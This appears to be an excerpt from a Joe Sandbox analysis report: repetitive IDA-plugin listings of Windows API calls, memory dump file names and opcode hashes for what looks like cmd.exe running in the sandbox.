• Snapshot File: hcaresult_13_2_10000_alpha.jbxd
Similarity
• API ID: memset$EnvironmentVariable
• String ID: DIRCMD
• API String ID: 1405722092-1465291664
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$iswdigit
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: +-~!$<>+-*/%()|^&=,
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2770779731-632268628
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019A11: _get_osfhandle.MSVCRT ref: 00019A1C
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019A11: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0001793A,00000104,?), ref: 00019A2B
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019A11: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00017908,00002374,-00000001), ref: 00019A47
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019A11: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00017908,00002374), ref: 00019A56
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019A11: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00017908,00002374), ref: 00019A61
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019A11: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04,?,?,?,?,?,?,?,?,?,?,?,?,00017908,00002374,-00000001), ref: 00019A6A
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 000286E3
                                                                                                                                                                                                                                                                                                                                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 000286EB
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002), ref: 0002872A
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00028743
                                                                                                                                                                                                                                                                                                                                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 0002874B
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019B3B: _get_osfhandle.MSVCRT ref: 00019B4E
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019B3B: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00050AF0,000000FF,0004A7F0,00002000,00000000,00000000), ref: 00019B8E
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019B3B: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,0004A7F0,-00000001,?,00000000), ref: 00019BA3
                                                                                                                                                                                                                                                                                                                                                                                                                          • longjmp.MSVCRT(00050A30,00000001), ref: 000287CE
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Console_get_osfhandle$Write$FileLockModeShared$AcquireByteCharHandleMultiReleaseTypeWidelongjmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1333215474-0
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BCA7
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: iswspace.MSVCRT ref: 0001BD1D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BD39
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BD5D
                                                                                                                                                                                                                                                                                                                                                                                                                          • iswspace.MSVCRT ref: 000161E4
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$iswspace
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3458554142-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: dddc842678d5418be84e582d74828d6a7725fddb925e7a4d0bbcd9fc64daf202
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3b289f3d1d4d62622a64812392af2d07fe6dd99b930e930d290fe521bc24e021
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dddc842678d5418be84e582d74828d6a7725fddb925e7a4d0bbcd9fc64daf202
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A91C1B4A04624DFEB64DF64ED45AAE77F8FF4A310F10812EE805D7290EB765880CB56
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000_alpha.jbxd
Similarity
• API ID: _wcsicmp
• String ID: ELSE$IF/?
• API String ID: 2081463915-1134991328
• Opcode ID: 8824a4dd2e293688f155804479593a004918f851116615f13de7363a49afa672
• Instruction ID: c561254fc22a107414ca51ca46a6958c255a769b7ea2622cf78e7ca166285731
• Opcode Fuzzy Hash: 8824a4dd2e293688f155804479593a004918f851116615f13de7363a49afa672
• Instruction Fuzzy Hash: 375148723083119AFB749B75AC4AFEF33E49B46320F14442AE5428B1D2EAB5C9C5C757
APIs
  • Part of subcall function 0002643A: NtOpenThreadToken.NTDLL ref: 00026454
  • Part of subcall function 0002643A: NtOpenProcessToken.NTDLL(000000FF,00000008,00000000), ref: 0002646C
  • Part of subcall function 0002643A: NtClose.NTDLL ref: 000264BD
• SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000), ref: 000263B5
• LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 000263E3
• RtlNtStatusToDosError.NTDLL ref: 00031EF4
• SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00031EFB
• GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(?,00000104,?,000000FF,00000002,00000000), ref: 00031F6B
• wcsstr.MSVCRT ref: 00031F86
• wcsstr.MSVCRT ref: 00031FA4
  • Part of subcall function 0002640A: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,?,00000000,?,00000000,?,?,?,?,00039C96,0002FDFA,00000000,?), ref: 0002642F
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000_alpha.jbxd
Similarity
• API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
• String ID:
• API String ID: 1313749407-0
• Opcode ID: 3ee4670a2c706ce8dff094e889b94f8c4aa642ae03dd91de303e04c2b1b72549
• Instruction ID: c01c7c6311beb8809551cdf66c09e5531ece05f1ba38a5578cdfa4f3ba850d89
• Opcode Fuzzy Hash: 3ee4670a2c706ce8dff094e889b94f8c4aa642ae03dd91de303e04c2b1b72549
• Instruction Fuzzy Hash: CB51F731A002394BDF64DF65AC887EE73E4EF59314F1401A9E909E7291EB75DE818B90
APIs
• memset.MSVCRT ref: 00039AC2
  • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
• SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,-00000105,?,00000000,?), ref: 00039B22
• SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00000000,?), ref: 00039B32
• SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,-00000105,?,00000000,?), ref: 00039BAD
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 00039BB8
• SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 00039BCB
• ??_V@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,?), ref: 00039BF9
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000_alpha.jbxd
Similarity
• API ID: Error$CurrentDirectoryModememset$Last
• String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1725644760-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 5aa19348ccbfb52e27d6116f941ec80b0f05ae1a555068ddd348204a32b0b58d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a81a02151554c6eb5717fe835cbc7fe8248b0dab817f17568e1a39102e8607ba
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5aa19348ccbfb52e27d6116f941ec80b0f05ae1a555068ddd348204a32b0b58d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80418F31A00219ABDF55DFA4EC85BEEB7F8EF08315F008199E905E7290EB78DA40CB55
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • RoInitialize.API-MS-WIN-CORE-WINRT-L1-1-0(00000000,00000000,00000000,00000001), ref: 0003B717
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleWindow.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0 ref: 0003B72A
                                                                                                                                                                                                                                                                                                                                                                                                                          • RoUninitialize.API-MS-WIN-CORE-WINRT-L1-1-0(?,?,?), ref: 0003B7FC
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018235: _get_osfhandle.MSVCRT ref: 0001824E
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018235: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00018256
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018235: _get_osfhandle.MSVCRT ref: 00018264
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018235: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 0001826C
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0003B76D
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleWindow.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0(?,?,?), ref: 0003B788
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Console$ModeWindow_get_osfhandle$InitializeUninitializememset
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: <
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1664749912-4251816714
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4707180919be0e883af0df2f35ba6abe5700dbf62d170ec221c22996df46b8b2
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 23abc4d191f47410e2ff72e2f320d5e5aec52283fbf43f638c72c0beb94361e9
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4707180919be0e883af0df2f35ba6abe5700dbf62d170ec221c22996df46b8b2
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D313EB5D00209AFDB11DFA9D485ADEBBFCEF49344F104116E905E3341EB349A45CB61
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,000000FF,?,?,?,00037FC9,?,000399AE,00000000,?,00000000,0002CF94,00000000,?), ref: 00018203
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetExitCodeProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,000000FF,?,00037FC9,?,000399AE,00000000,?,00000000,0002CF94,00000000,?), ref: 0001820E
                                                                                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,00037FC9,?,000399AE,00000000,?,00000000,0002CF94,00000000,?), ref: 00018229
                                                                                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00037FC9,?,000399AE,00000000,?,00000000,0002CF94,00000000,?), ref: 0002B0AB
                                                                                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00037FC9,?,000399AE,00000000,?,00000000,0002CF94,00000000,?), ref: 0002B0C1
                                                                                                                                                                                                                                                                                                                                                                                                                          • fprintf.MSVCRT ref: 0002B0D5
                                                                                                                                                                                                                                                                                                                                                                                                                          • fflush.MSVCRT ref: 0002B0E3
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$CloseCodeEnterExitHandleLeaveObjectProcessSingleWaitfflushfprintf
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4271573189-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e819367f5a6ab123a492c43a3d68000184b17fff928edf23b569bdaab725c132
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 93bf0dc5d4534ef2fbac858c4b725c4f842735600276c974f4ee69cadd38fab8
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e819367f5a6ab123a492c43a3d68000184b17fff928edf23b569bdaab725c132
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD014F75205610EFFB056BE8ED0EA9B7B6CAF06326F100344F115A21E2CBB91A409B66
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
• memset.MSVCRT ref: 00023D30
  • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
• GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,?,?,-00000105,?,?,00000000), ref: 00023E3D
• ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,00000000), ref: 00023E88
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000_alpha.jbxd
Similarity
• API ID: memset$FullNamePath
• String ID:
• API String ID: 3158150540-0
APIs
• _get_osfhandle.MSVCRT ref: 0002858D
• WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00028595
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002), ref: 000285D4
• _get_osfhandle.MSVCRT ref: 000285ED
• WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 000285F5
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000_alpha.jbxd
Similarity
• API ID: Console$Write_get_osfhandle$Mode
• String ID:
• API String ID: 1066134489-0
APIs
• _tell.MSVCRT ref: 0001B7F9
• _close.MSVCRT ref: 0001B82C
• memset.MSVCRT ref: 0001B8CC
• GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00007FE7), ref: 0001B936
• GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0004C9F0), ref: 0001B947
• ??_V@YAXPAX@Z.MSVCRT(?), ref: 0001B96D
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000_alpha.jbxd
Similarity
• API ID: ConsoleInfoOutput_close_tellmemset
• String ID:
• API String ID: 1380661413-0
APIs
• memset.MSVCRT ref: 00017F7C
  • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
• GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,-00000001,?,?,00000001), ref: 00017FC0
• GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00017FF3
• ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,?,00000001), ref: 0001800C
• ??_V@YAXPAX@Z.MSVCRT(?), ref: 0002B05A
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$DriveInformationTypeVolume
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 285405857-0
APIs
  • Part of subcall function 00019A11: _get_osfhandle.MSVCRT ref: 00019A1C
  • Part of subcall function 00019A11: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0001793A,00000104,?), ref: 00019A2B
  • Part of subcall function 00019A11: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00017908,00002374,-00000001), ref: 00019A47
  • Part of subcall function 00019A11: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00017908,00002374), ref: 00019A56
  • Part of subcall function 00019A11: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00017908,00002374), ref: 00019A61
  • Part of subcall function 00019A11: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04,?,?,?,?,?,?,?,?,?,?,?,?,00017908,00002374,-00000001), ref: 00019A6A
• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04,?,?,?,00050AF0,00000002,?,?,0002A669,%s %s ,?,?,00000000), ref: 000199DC
• _get_osfhandle.MSVCRT ref: 000199EC
• WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,0002A669,%s %s ,?,?,00000000), ref: 000199F4
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04), ref: 00019A09
  • Part of subcall function 00019B3B: _get_osfhandle.MSVCRT ref: 00019B4E
  • Part of subcall function 00019B3B: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00050AF0,000000FF,0004A7F0,00002000,00000000,00000000), ref: 00019B8E
  • Part of subcall function 00019B3B: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,0004A7F0,-00000001,?,00000000), ref: 00019BA3
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000_alpha.jbxd
Similarity
• API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
• String ID:
• API String ID: 4057327938-0
APIs
• _get_osfhandle.MSVCRT ref: 00019B4E
• WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00050AF0,000000FF,0004A7F0,00002000,00000000,00000000), ref: 00019B8E
• WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,0004A7F0,-00000001,?,00000000), ref: 00019BA3
• WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00050AF0,?,?,00000000), ref: 0002C0BC
• WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00050AF0,00001000,0004A7F0,00002000,00000000,00000000,00050AEE), ref: 0002C0DC
• WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,0004A7F0,00000000,?,00000000), ref: 0002C0FA
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000_alpha.jbxd
Similarity
• API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
• String ID:
• API String ID: 3249344982-0
APIs
  • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BCA7
  • Part of subcall function 0001BC30: iswspace.MSVCRT ref: 0001BD1D
  • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BD39
  • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BD5D
• _wcsicmp.MSVCRT ref: 000375AC
• _wcsicmp.MSVCRT ref: 000375CB
• _wcsicmp.MSVCRT ref: 000375F1
Strings
Memory Dump Source
